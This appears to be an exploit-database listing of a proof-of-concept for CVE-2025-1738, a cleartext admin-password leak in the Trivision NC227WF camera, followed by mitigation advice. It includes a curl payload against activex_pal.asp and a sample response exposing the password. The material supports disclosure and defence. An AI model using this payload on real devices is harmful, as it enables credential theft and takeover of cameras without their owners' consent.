Exploit for CVE-2025-1738 CVE-2025-1738 CVE-2025-1739

Name: Exploit for CVE-2025-1738 CVE-2025-1738 CVE-2025-1739
Rating: 5 (89 reviews)
2026-04-05 | CVSS 7.1
## https://sploitus.com/exploit?id=43758981-1543-55AD-AF4B-E1D0B68CAC77
# CVE-2025-1738 - Trivision Camera NC227WF PoC


  
  
  




## 📋 Overview


Following responsible disclosure, two official CVEs were assigned.

| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Cleartext Password Exposure |

---

## 🔍 CVE-2025-1738 — Cleartext Password Exposure (CWE-598)

### Description

Any local user can retrieve the admin password in plaintext without needing prior authentication.

- **Attack Vector:** Local (AV:L)
- **CVSS Score:** 6.2
- **CWE:** CWE-598 (Use of GET Request Method with Sensitive Query Strings)

### Payload

```bash
curl -u admin:whatever http://: --request-target en/player/activex_pal.asp
```

### Example Response



```
...password=unguessable123!...
```

The admin password is returned in cleartext within the response body.

---



## 🛡️ Mitigation

- **Upgrade firmware** if a patched version is available from Trivision.
- **Isolate the camera** on a dedicated VLAN with no external access.
- **Firewall** the camera's management port from untrusted network segments.
- **Change default credentials** and rotate passwords regularly.
- Monitor for unexpected access to `activex_pal.asp` and `mblogin.asp`.




---

## 📚 References

- [NVD — CVE-2025-1738](https://nvd.nist.gov/vuln/detail/CVE-2025-1738)
- [NVD — CVE-2025-1739](https://nvd.nist.gov/vuln/detail/CVE-2025-1739)

---

## ⚖️ Disclaimer

This repository is for **educational and authorized security research only**. The authors are not responsible for any misuse. Always obtain explicit permission before testing any device.